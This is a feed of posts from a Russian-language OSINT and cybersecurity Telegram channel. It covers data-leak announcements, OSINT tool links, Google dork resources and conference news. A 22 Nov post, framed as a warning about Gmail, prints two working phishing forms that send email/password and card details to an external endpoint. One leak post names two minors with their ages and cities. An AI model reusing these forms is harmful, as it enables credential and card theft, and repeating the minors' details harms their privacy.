❗️Полный отчет здесь. Не забудьте поделиться с коллегами!

#анатитика_и_тренды

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 17:27


База данных пользователей интернет-магазина одежды, снаряжения для охоты, рыбалки и силовых структур «БШФ+» стала доступна в интернете.
Утечка затронула персональную информацию 5000 пользователей сайта и 17000 заказов.

Актуальность - 20.03.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки
▪️ip-адрес

#утечка

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 17:01


А ты уже с нами!!!

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 14:02


🔤 Google Dorks for Bug Bounty - движок включает в себя множество потрясающих dorks для, например, облачного хранилища, параметров SQLi Prone, параметров SSRF Prone, конечных точек API и многого другого.

➡️https://taksec.github.io/google-dorks-bug-bounty/
➡️https://github.com/TakSec/google-dorks-bug-bounty/

ℹ️ Альтернативные сервисы:

➡️https://dorks.faisalahmed.me/#
➡️https://nitinyadav00.github.io/Bug-Bounty-Search-Engine/
➡️https://pentest-tools.com/information-gathering/google-hacking
➡️https://elite-google-dorks-search-by-biscuit.vercel.app/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #DORK #BUG

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 12:00


😆😂 "База" о киберразведчиках и военно-политических аналитиках от Игоря Ашманова. Красиво, чесслово!

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 11:01


🔤 SEON — это инструмент для предотвращения мошенничества, который создает подробные цифровые следы пользователей, анализируя их адреса электронной почты, номера телефонов и IP-адреса. SEON проверяет все присутствие человека в сети — его аккаунты в социальных сетях, цифровую активность и поведение устройств. Пробный период: 500 проверок/месяц.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS #SEON

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 09:21


🦠 Знаете ли вы, что Gmail позволяет использовать HTML-тег <form> ? Эта функция представляет потенциальную угрозу безопасности, особенно при попытке украсть учетные данные пользователя или конфиденциальную информацию. Учитывайте этот риск в процессе обеспечения ИБ.

1⃣Пример кода, выводящего форму для кражи пароля
<form action= "https://httpbin.org/post" method= "POST" > 
< input type = "email" name= "email" placeholder= "Email or phone" required>
< input type = "password" name= "password" placeholder= "Password" required>
< input type = "submit" value= "Next" >
</form>


2⃣ Пример кода, выводящего форму для кражи данных кредитной карты
<!DOCTYPE html > 
< html lang = "en" >
< head >
< meta charset = "UTF-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1.0" >
< title > Оплата кредитной картой </ title >
</ head >
< body >
< div class = "payment-container" >
< h2 > Оплата кредитной картой </ h2 >
< form action = "https://httpbin.org/post" method = "POST" >
< label for = "cardholder-name" > Имя владельца карты</label> < input type
= " text " id = " cardholder-name" name = "cardholder_name" placeholder = "John Doe" обязательно > <label for = "card-number" > Номер карты</label> < input type = " number " id =

" card - number " name = "
card_number " placeholder = " 1234 5678 9012 3456" обязательно > <label for = "expiry-date" > Дата истечения срока действия</label> < input type = " text " id =

" expiry - date " name = " expiry_date
" placeholder = " MM / YY " обязательно > < label for = " cvv " >

CVV </label> < input type = " number
" id = " cvv " name = " cvv " placeholder = " 123" обязательно >

< input type ="submit" value = "Оплатить сейчас" >
</ form >
</ div >
</ body >
</ html >

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #GMAIL #HACK

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 07:01


А вот и трансляцию выложили...

📱 https://vk.com/video-26514504_456245505

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 21:44


База данных с информацией о 70 000 пользователях хостинга серверов Minecraft apexnodes.xyz стала общедоступной.
Интересно, что владельцами хостинга являются три подростка, среди которых - основатель Амир (14 лет, Уральск, Казахстан) и ответственный за финансы Руслан (16 лет, Липецк, Россия) - индивидуальный предприниматель создавший юридическое лицо для приема платежей.
Только вот, штрафы для юридических лиц за утечку персональных данных составляют от 1 до 6 миллионов рублей за первое нарушение и до 18 миллионов рублей за повторную утечку, согласно п.9 ст. 13.11 КоАП РФ.

Состав
▪️Почта
▪️Логин
▪️Хэш-пароля
▪️IP-адрес

Хотим обратить внимание ребят, что для того чтобы считаться «оператором обработки персональных данных», необходимо быть включённым в реестр операторов, обрабатывающих персональные данные.
Однако ИП Руслана и британская компания в этом реестре не значатся.

Пока им ничего не грозит (фактической утечки ПДн нет), но видимо Руслан и его родители сейчас очень сильно напряглись...ведь отвечать именно ему.

#утечка

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 17:02


ODIN

IP search engine.

Search by ip, domain name, ASN, geolocation, BGP prefix, ASN number, WHOIS updated date and other parameters.

search.odin.io

Creator twitter.com/OdinThreatIntel

#osint

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 15:00


🖥 Подборки полезного софта для ПК
https://sourceforge.net — один из самых больших в мире каталогов открытого ПО.
https://www.producthunt.com — популярная онлайн-платформа, созданная для поиска новых продуктов, стартапов и инновационных решений на рынке технологий.
https://alternativeto.net — сервис помогает находить альтернативы любимым продуктам.
https://alternative.me — сайт для поиска альтернативного программного обеспечения.
https://openalternative.co — каталог open-source софта.
https://www.fosshub.com — большой каталог популярного софта.
https://hub.docker.com — платформа для хранения и обмена контейнерами Docker, где разработчики могут находить, загружать и делиться контейнерами для быстрого развертывания приложений.
https://www.comss.ru/list.php?c=security — большая подборка программ, связанных с безопасностью.

🖥 Реестр доверенного российского ПО от Минцифры
https://reestr.digital.gov.ru/reestr/

🖥 Подборки с полезным софтом для Android
https://f-droid.org — бесплатное и открытое программное обеспечение для Android.
https://www.rustore.ru — российский официальный магазин приложений для Android.

🖥 Подборка ПО для железа/hardware
https://www.aida64.com/downloads — приложение для тестирования производительности системы, диагностика и получение информации о ПК.
https://www.techpowerup.com/gpuz — бесплатная утилита для отображения технической информации о видеоадаптере.
https://www.cpuid.com/softwares/cpu-z.html — бесплатная прикладная утилита для отображения технической информации о персональном компьютере.
https://getfancontrol.com — утилита для управления скоростью вентиляторов (CPU, GPU, системной платы, жёстких дисков).
https://crystalmark.info/en/software/crystaldiskinfo — подробная информация о HDD/SSD, показывает состояние "здоровья" и температуру нагрева.

🖥 Portable-версии популярного софта (без установки в реестре)
https://portableapps.com

🖥 Коллекция полезных утилит от Нира Софера
https://www.nirsoft.net

🖥 Коллекция полезных бесплатных утилит от Марка Руссиновича
https://live.sysinternals.com

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 13:55


Sandee - подробная карта пляжей планеты.
Бесплатный общедоступный сервис, где можно найти даже малоизвестные пляжи, в самых разных странах мира.
Позволяет узнать подробности о пляже вместе с фотографиями.

https://sandee.com/map

👉 Подписывайтесь на OSINT Беларусь

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 11:01


😇 Часто бывает нужно, а под рукой нет...

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 07:01


🔤 Global Brand Database - глобальная база брендов. Можно искать по названию, по части названия, по фото, по правообладателю и по стране. Можно скачать, как найденные результаты по бренду, так и выписку по нужной стране.

➡️https://branddb.wipo.int

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS #BRAND

Интернет-Розыск I OSINT I Киберрасследования

21 Nov, 05:00


🔎 Команда Яндекса разработала бесплатный онлайн-курс для учащихся 7-9 классов, посвящённый базовым правилам безопасного поведения в интернете. В рамках детективного квеста школьникам предлагается распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли. Мы такое любим!

1⃣ Защита аккаунтов
2⃣ Выявление фишинга

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 18:19


База данных пользователей профессионального инструмента для работы на Рынке Детских Товаров RDT-info.ru в формате организации выставок - стала общедоступной.
Несмотря на то, что на сайте публикуются данные о 20 000 уникальных посетителей в месяц, утечка затронула только 1500 реальных пользователей, причём многие из них не заходили на сайт уже десятки лет.

Актуальность - 20.11.2024

Состав
▪️ФИО
▪️Почта

#утечка

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 16:22


🥱 В сети "нашли" (спустя пару недель после моей публикации) способ сдеанонить администраторов Telegram-каналов с помощью кастомных эмодзи или стикеров... Особую пикантность этой истории придает тот факт, что данная новация была мной описана еще в 2022 г. в работе "Получение криминалистически значимой информации из мессенджера Telegram: практическое пособие" — Москва: Московская Академия СК России. Стоит ли уточнять, как давно она была известна фактически?

😭 Вот такой у нас OSINT... не умеем даже своевременно подхватить и перевести на великий и могучий посты западных блогеров. Грустно...

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 15:19


☝️😉 Мы не сидим сложа руки... Форум ИТ-Диалог в Санкт-Петербурге. Поучаствовал в обсуждении проблем информационной безопасности или, как это назвали организаторы - "Цифровая деградация. Сокращение цифровых сервисов как ответ на киберугрозы". Было интересно...

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 13:17


База данных одного из интернет-магазинов сети Vsemayki.ru, представленного на сайте shop-clothing.ru, оказалась в открытом доступе.
Утечка одного сайта из сети интернет-магазинов, специализирующихся на создании одежды и аксессуаров с принтами, затронула 932 000 клиентов.

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #vsemayki

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 13:05


Хакеры утверждают, что получили доступ к базе одного из лидеров оптического рынка «Айкрафт», сеть магазинов которого насчитывает более 100 городов страны.
В результате утечки было раскрыто 4,1 миллиона данных клиентов и 3500 сотрудников.
Однако к предоставленной выборке клиентов - есть вопросы, например, наличие паспортных данных, места работы, должности или суммы задолженности перед управляющей жилищной компанией.

Актуальность - 18.11.2024

#утечка #Айкрафт #eyekraft

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 12:02


📱 В Telegram активно развиваются Mini Apps (мини-приложения). Собственно они и вбили последний гвоздь в легенду о приватности мессенджера. Напомню, что один только Hamster Kombat успешно идентифицировал (при помощи WebGL) более 300 млн. пользователей. Уже более 500 миллионов пользователей Telegram каждый месяц взаимодействуют с различными мини-приложениями. Криптокошелек Telegram заявил о готовности раскрывать данные пользователей.

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 09:52


Что-то я захотел написать книгу про проведение расследований по открытым данным...

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 09:32


📓 OPEN SOURCE INTELLIGENCE FOR COUNTERTERRORISM

Интернет-Розыск I OSINT I Киберрасследования

20 Nov, 08:10


Правда, Михаил - умница!

📱 https://vk.com/video-58486999_456239215

Интернет-Розыск I OSINT I Киберрасследования

19 Nov, 18:19


🔐Виртуальные машины с точки зрения безопасности.

Виртуальные машины - крайне сильное средство для подмены отпечатоков компьютера, защиты от огромного количества вредоносного ПО и многого другого. Многие корпорации чуть ли не основывают безопасность компании в сети на виртуальных машинах - а значит доверяют этому методы миллиарды долларов.

Но как же правильно выбрать виртуальную машину? Даже у такого серьзного инструмента есть много ОЧЕНЬ ОПАСНЫХ "подводных камней".

Подробнее про подбор виртуальной машины и некоторые "Подводные камни" читайте в новой статье от Jhorj Privacy - https://telegra.ph/Virtualnye-mashiny-s-tochki-zreniya-bezopasnosti-11-19


📚Приватное сообщество Jhorj Club, работай и учись с профи - https://t.me/Jhorj_club/15

🔐Ссылка на канал Jhorj Privacy - https://t.me/+6YlYqZz7gMYyOTY6

Интернет-Розыск I OSINT I Киберрасследования

19 Nov, 16:37


Директор департамента информационно-аналитических исследований компании T.Hunter Игорь Бедеров принял участие в конференции Profi to Profi. Темой доклада стал поиск и нейтрализация угроз в сетях, связанных с утечками информации.

Тренды последних лет, смешение компетенций ИБ-отдела и службы безопасности, основы инфобеза для бизнеса в условиях восьмидесятикратного роста технологических преступлений за последние десять лет и многое другое. Когда мы получим итоговую концепцию уголовной ответственности за незаконную обработку персональных данных? Обо всём этом в записи выступления с конференции.

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

19 Nov, 12:00


⚪️ Отзывы, как инструмент манипуляций, в современном мире сами стали частью бизнеса. Могут вывести в лидеры почти любое предприятие и точно также его уничтожить - рассказывает RenTV. Сразу вспоминается наше расследование деятельности российской сетки сайтов-отзовиков, принадлежащей PR-агентству.

Интернет-Розыск I OSINT I Киберрасследования

19 Nov, 09:01


📌 https://youtu.be/r_hcBuGdEH8

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 16:51


База данных сети сайтов ООО «Спорт-Юнити» стала общедоступной.
Утечка затронула четыре сайта компании, общая численность которых превышает 500 000 пользователей самокатов и другой спортивной продукции.
В настоящее время эти сайты недоступны.

Актуальность - 13.11.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 14:53


🔤 deflock - сеть онлайн-камер с распознаванием номеров автомобилей, что позволяет следить за их перемещениями. есть и пара-тройка российских.

➡️https://deflock.me/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #AUTO #GEOINT

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 12:01


📶 Завтра начинаем... Присоединяйтесь!

XI МЕЖДУНАРОДНЫЙ ФОРУМ «ИТ-ДИАЛОГ»
📆 14-16 ноября 2024
◾️ Санкт-Петербург

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 11:10


В открытый доступ попали данные 16 000 клиентов интернет-магазина профессиональной косметики в Краснодарском крае, принадлежащем компании «МедКруг».
В данный момент сайт находится на реконструкции.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 11:01


База данных с информацией о 15 000 клиентах страховой компании «Финист», которая входит в пятёрку крупнейших страховых брокеров России, стала доступна в Интернете.
Несмотря на выручку в размере 12 миллиардов рублей в 2021 году, компания не смогла своевременно обновить систему безопасности Bitrix.

Актуальность - 17.05.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Место работы
▪️Должность

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 09:18


Более 26 000 клиентов компании Sotovik стали жертвами утечки данных.
Компания специализируется на продаже техники Apple и сопутствующих товаров. Среди её постоянных клиентов — сеть спортивных клубов World Class, базу данных которой также ранее выложили в открытый доступ.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 09:17


База данных компании «Вендос» оказалась в открытом доступе и затронула более 9 000 пользователей.
Компания с 1999 года производит бахилы, одноразовую одежду для медицинской и пищевой отраслей, а также, что неожиданно, вендинговые аппараты.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 09:00


🔤 ToolDatabase — огромный набор инструментов для исследования данных. Весьма полезные вещи в работе аналитика. Отдельные "эксперты" наберут тут материала на 3 десятка постов)))

➡️https://wiki.digitalmethods.net/Dmi/ToolDatabase

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 06:28


Бэкап SQL-баз c названием ZUP19 и BKHL, общим размером 40 ГБ, сайта Континентальной хоккейной лиги был выложен в открытый доступ.
Ранее хакеры уже публиковали данные пользователей, фотографов и судей, которые были зарегистрированы на сайте, а также доступ к админской панели ресурса.

Актуальность - 03.09.2023

#утечка #кхл #khl

Интернет-Розыск I OSINT I Киберрасследования

13 Nov, 06:02


🔤 Нейро теперь помогает найти ответы в Поиске по картинкам и в Умной камере Яндекса — с помощью новой мультимодальной модели. Пользователь может не только узнать, что изображено на картинке, но и задать вопрос по каждой её детали. Например, гуляя по музею, можно сфотографировать натюрморт голландского живописца и спросить, что символизирует тот или иной предмет на картине.

➡️https://ya.ru/images/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHOTO #AI

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 20:38


Я не могу не поделиться - коллега прислал!!

ИИ от Яндекса выдало базууу!))

Хавский Гром&ко. Подписаться

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 18:03


🔤 study.new - ИИ-фишка для анализа роликов на YouTube. Позволяет сгенерировать текстовую лекцию на основе данных видеоролика. Для учебных видео - маст хэв. Попробуйте на нашем с Павлом Хавским интервью:

➡️study.new/https://www.youtube.com/watch?v=iCXsaTbwVqA

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #YOUTUBE #AI

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 15:00


🔤 OSINT LIAR - браузерное расширение для сбора разведданных с открытым исходным кодом (OSINT) и общедоступных разведданных (PAI) в режиме реального времени. Позволяет захватывать веб-страницы, PDF-файлы, изображения, видео, аудио и многое другое. Сохраняйте их локально на вашем компьютере. Контент хранится в структурированном, доступном для поиска формате и может быть доступен офлайн в любое время.

➡️https://osintliar.com/
➡️https://chromewebstore.google.com/detail/osint-liar/mgmandbcdaecndcllojppohiekdbhcie

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TOOLS #ARCHIVE

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 12:30


Как обещал, начинаю накидывать обзор на ThreatHunter DRP от компании @tomhunter.

Тип ПО: онлайн-сервис (SaaS)
Назначение: поиск и нейтрализации угроз в сетях общего и ограниченного доступа, связанных с утечками информации и подготовкой хакерских атак.

Возможности:
1⃣ Мониторинг Telegram-каналов и чатов (в перспективе также мониторинг Даркнет-ресурсов, поисковой выдачи, социальных сетей) по заданным ключевых словам;
2⃣ Мониторинг скомпрометированных данных (утечек), а также источников утечек;
3⃣ Мониторинг фишинговых доменов, предупреждение регистрации схожего доменного имени (архивирование веб-ресурсов и их кода);
4⃣ Мониторинг внешнего сетевого периметра, выявление уязвимостей (собственные веб-узлы и веб-узлы партнеров);
5⃣ Мониторинг онлайн-репозиториев на предмет обнаружения утечки программного кода.

Что понравилось?
Сервис позволяет включить в процесс обеспечения информационной безопасности даже тех сотрудников СБ, которые всегда были "на Вы" с современными технологиями. Сегодня это крайне важно. Сервис позволяет вести мониторинг контура (первой линии обороны) ИТ-структуры компании, начиная от разведки угроз и заканчивая сканированием на наличие уязвимостей.
Отдельно стоит упомянуть функционал мониторинга чатов (в т.ч. приватных) в Telegram, а также подключение в будущем возможности мониторинга Даркнета и Клирнета. Это позволяет не только выявлять признаки подготовки хакерской атаки на вашу компанию, но и предупреждать иные категории рисков (вербовку сотрудников, их провокационные высказывания, распространение фейков или недостоверных данных).

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 11:44


Современный корпоративный шпионаж кажется со стороны очень специфическим и высокотехнологичным. Но на проверку оказывается что все достаточно проще - по статистике в качестве "прослушки" в 80% случаев используются обычные цифровые диктофоны. Ну и все то,что проще всего достать на рынке.

В этих слайдах вы сможете получить ответы на вопросы, что-же все таки используют чаще всего в корпоративном шпионаже, как это найти и как постараться противодействовать этому.

Интернет-Розыск I OSINT I Киберрасследования

12 Nov, 10:39


Вот, прямо, интересно стало, что там родило за лекцию Общество ЗНАНИЕ на пару со спикером...

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 20:50


База данных с информацией о тысяче клиентов производителя женской и мужской одежды D.S. стала доступна в интернете.
Несмотря на то, что модели разрабатывались российскими и итальянскими дизайнерами, а вся продукция проходила сертификацию, обеспечить должную защиту данных пользователей не получилось.

Актуальность - 23.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Город

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 20:42


Организаторы фестиваля маркетинга и креатива в сфере недвижимости WOW fest также пострадали от утечки.
Несмотря на то, что сайт был создан для смелых и человечных, база на 700 строк с данными пользователей просочилась из-за уязвимости Bitrix.

Актуальность - 20.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Город
▪️Место работы
▪️Специальность

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 20:32


Если вам стало скучно без утечек через уязвимость Bitrix, то продолжим.
Сайт одного из крупнейших заводов ювелирных изделий TALANT был взломан, и в результате в открытый доступ попали данные 1000 пользователей сайта (очевидно, это не самый крупный завод).

Актуальность - 20.09.2024

Состав
▪️ФИО
▪️Телефон
▪️Почта

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 18:57


База данных интернет-магазина аккумуляторов для автомобилей ООО «Автоисточник» стала общедоступной.
Утечка содержит два файла: «Все заказы» (764 000 записей) и «Заказы» (323 000 строк).

Актуальность - 08.11.2024

Состав
▪️Имя
▪️Адрес
▪️Почта
▪️Телефон

#утечка

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 18:17


🔤 maltego-telegram - товарищи! Это случилось... Интуристы допиндосили, что каналы и чаты в Telegram можно деанонить через фирменные стикеры и эмоджи. Даже запилили трансформ к Мотыге по данному поводу.

➡️https://github.com/vognik/maltego-telegram

ℹ️ Подробнее о методике работы можно прочитать в статье What's wrong with stickers in Telegram? Deanonymize anonymous channels in two clicks

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TELEGRAM #MALTEGO

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 15:30


#news Пятнично добиваем остатки ещё не слитых данных россиян и не только вместо с одной известной букмекерской конторкой 1WIN. На даркнет-форуме вчера всплыли актуальные SQL-дампы части пользователей. 29 GB на ~100 миллионов человек. Бонусом инфа по админам и разработчикам.

Имена, почты, телефоны, даты рождения, страны, айпишники, хеши паролей и прочее. При этом заявление по взлому от основателя — как отдельное слово в жанре реакций на утечки такого масштаба. Вкратце, «Ну вот мы наш отдел ИБ усиляли, молились, чтобы взломы нас обошли стороной, но не сложилось. IT-отдел мы, конечно, не виним, ребята — молодцы, а вот взломщики — шантажисты и нехорошие люди. Ошибки случаются, всем спасибо». Не то чтобы от шарашки такого плана ждёшь многого, но читается всё равно с лёгким удивлением на лице. Впрочем, казино всегда в выигрыше, так что чего им стесняться. Ну слили и слили, дальше-то что? Вы нам деньги заносить перестанете, что ли?

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 12:02


Wireshark — это мультифункциональный швейцарский армейский нож среди инструментов для сетевого анализа. И независимо от того, ищите ли вы пиринговый трафик (P2P, peer-to-peer) в своей сети или просто хотите посмотреть, к каким веб-сайтам осуществляется доступ с определенного IP-адреса, Wireshark способен помочь вам...

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 09:02


😉👍 Ближайшие мероприятия с моим участием...

XI МЕЖДУНАРОДНЫЙ ФОРУМ «ИТ-ДИАЛОГ»
📆 14-16 ноября 2024
◾️ Санкт-Петербург

Межотраслевая конференция "Безопасность клиента на первом месте"
📆 19 ноября 2024
◾️ Москва

ФОРУМ «БЕЗОПАСНОСТЬ 365»
📆 26-28 ноября 2024
◾️ Санкт-Петербург

Встреча клуба "СБ-Питер"
📆 28 ноября 2024
◾️ Санкт-Петербург

Конференция КОНТРАГЕНТЫ 2024
📆 4-5 декабря 2024
◾️ Онлайн

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 08:45


Уязвимость в Bitrix затронула надёжный (как они пишут о себе) интернет-магазин автоаксессуаров и автохимии в Екатеринбурге под названием «Автопилот».
В настоящее время на сайте проводятся технические работы, поскольку в открытом доступе оказалась база данных 27 000 клиентов компании.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 08:32


Наверное, краснодарским девушкам будет интересно узнать об утечке из-за уязвимости в Bitrix в компании Protuning Company, крупнейшем тюнинг-ателье автомобилей премиум-класса.
Утечка затронула 15 000 клиентов и сотрудников компании.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Дата рождения
▪️Город
▪️Место работы
▪️Почта
▪️Соцсети

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 07:08


Из-за уязвимости в Bitrix снова пострадал интернет-магазин для взрослых «Эролайф».
Утечка затронула 19 600 пользователей сайта.
Несмотря на экспертность в передовых средствах контрацепции, им не удалось сохранить конфиденциальность данных своих пользователей.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Город
▪️Почта
▪️Телефон

#утечка  #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 06:51


Взлом через уязвимость Bitrix также коснулся интернет-магазина Rossimvol, специализирующегося на продаже кубков и символов.
Утечка данных затронула 53 000 пользователей.
Ранее сообщалось, что через эту уязвимость было взломано более 20 000 ресурсов.

Актуальность - 09.08.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Пароль в открытом виде (иногда)

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 06:26


Тема взлома через уязвимость Bitrix также касается утечки базы данных торгового дома текстильных изделий из Иваново "Юнитрейд", которая затронула данные 66 000 пользователей сайта.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Город
▪️Место работы
▪️Почта
▪️Телефон

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 06:26


База данных интернет-магазина «Шелковый путь» стала общедоступной.
Из-за редкого обновления сайта, что понятно по разделу «Новости», последний раз изменявшегося в середине 2023 года, возможно не была вовремя устранена уязвимость в системе Bitrix, что могло спровоцировать взлом сайта и утечку данных о 19 000 пользователях

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

08 Nov, 06:02


В «Сбере» назвали медицину и маркетплейсы главными источниками утечки персональных данных граждан. А на банковскую сферу приходится всего 2% сливов, рассказал зампред правления Сбербанка Станислав Кузнецов. По его данным, сейчас в открытом доступе можно найти информацию о 90% взрослых россиян. В Минцифре при этом заявили, что закон об оборотных штрафах для бизнеса за утечку персональных данных примут до конца 2024 года - пишет Коммерсант.

Из утечек в руки злоумышленников могут попасть не только номера телефонов, но и адреса посещаемых сайтов, сведения об устройствах. Это не только повод для досады, можно потерять деньги, говорит глава компании Интернет-Розыск.рф Игорь Бедеров: «То, что уже утекло, оно утекло. Это устранить уже невозможно. Помимо того, что крадут непосредственно регистрационные и пользовательские данные, утекают еще и логи. Это тоже может быть агрегировано и использовано для совершения взломов».

Интернет-Розыск I OSINT I Киберрасследования

07 Nov, 20:20


Новую мошенническую схему тестируют в теневом сегменте Telegram-каналов.
Злоумышленники представляются администраторами чатов, связанных с утечками данных, и предлагают предоставить им займ или купить различные базы, требуя предоплату.
Они рассчитывают на то, что пользователи поверят в авторитет администраторов (дискредитируя их) и не обратятся в правоохранительные органы.
Наивно, но может сработать.

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 19:08


В тематических ресурсах была размещена база данных детей.
Информация о 4300 пользователях сайта «Юнармия» оказалась в открытом доступе после взлома сайта.

Актуальность - 01.11.2024

Состав
▪️ФИО
▪️Дата рождения
▪️Телефон
▪️Почта
▪️Адрес прописки

#утечка #юнармия

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 17:01


Скоро на ⚪️... журналистское расследование интернет-мошенничества.

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 15:00


Мессенджер Telegram пользуется колоссальным успехом среди преступников, особенно в Юго-Восточной Азии. Такой вывод сделали эксперты Управления ООН по наркотикам и преступности в своем отчете «Транснациональная организованная преступность и конвергенция кибермошенничества, подпольного банкинга и технологических инноваций: меняющийся ландшафт угроз».

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 13:29


С сегодняшнего дня Роскомнадзор начал вести список блогов и каналов с аудиторией свыше 10 тысяч подписчиков. Владельцам каналов нужно будет передать в ведомство название и ссылку на страницу в социальной сети, Ф.И.О. Юридические лица должны сообщить полное и краткое наименование, организационно-правовую форму и основной государственный регистрационный номер.

Вы уже побежали регаться?

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 09:30


📓UNREDACTED Magazine #7

Интернет-Розыск I OSINT I Киберрасследования

01 Nov, 08:19


🔤 Orhyginal Maps - огромное количество картографических сервисов в одном.

➡️http://map.orhyginal.fr

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #GEOINT #MAP

Интернет-Розыск I OSINT I Киберрасследования

31 Oct, 15:31


#article В нашей новой статье на стыке ИБ и юриспруденции мы разбираем правовые основы видеонаблюдения. Как организовать его в компании в соответствии с законом, какими статьями и нормами оно регулируется, как собирать биометрию и при каких условиях в дело вступает Единая Биометрическая Система. За подробностями добро пожаловать на Хабр!

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

31 Oct, 12:25


В условиях «сложных отношений с Западом» рекомендуется свести к минимуму использование электронных почтовых адресов, принадлежащих крупным западным корпорациям - RTVI.

Какие мои аргументы:

1️⃣ GMail - это не только мобильное приложение, которое предустановлено на большинстве мобильных телефонов в мире. Сервис является одним из поставщиков данных пользователей в такие сервисы, как ECHO, Locomotive, Lavander и др., которые предназначены для разведывательных органов иностранных государств, а также военных. Да, не только для слежки... по их данным уже боеголовки наводят.

2️⃣ Использование иностранного почтового сервиса в качестве средства 2FA в отечественных сервисах - это прямой риск. Если вы - чиновник, военный или сотрудник ФСБ, то этим вы просто отдали иностранной разведке возможность получения доступа к вашему аккаунту в любом отечественном онлайн-сервисе... Иностранные им и так все отдают ))) Да и простым гражданам следует опасаться. Мало ли где могут всплыть их доступы в ходе гибридного конфликта.

Интернет-Розыск I OSINT I Киберрасследования

30 Oct, 19:04


